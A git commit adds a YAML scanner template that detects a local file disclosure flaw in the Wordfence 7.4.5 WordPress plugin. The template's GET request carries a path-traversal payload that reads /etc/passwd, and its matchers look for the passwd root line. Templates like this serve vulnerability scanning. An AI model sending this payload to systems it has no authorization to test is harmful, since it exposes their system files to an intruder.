Create wordpress-wordfence-lfi.yaml

patch-1
Roberto Nunes 2021-07-12 18:45:23 +09:00 committed by GitHub
parent 74db4223c1
commit 74e2787c2a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: wordpress-wordfence-lfi
info:
name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
author: 0x_Akoko
severity: high
reference: |
- https://www.exploit-db.com/exploits/48061
- https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
tags: wordpress,wp-plugin,lfi,wordfence
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200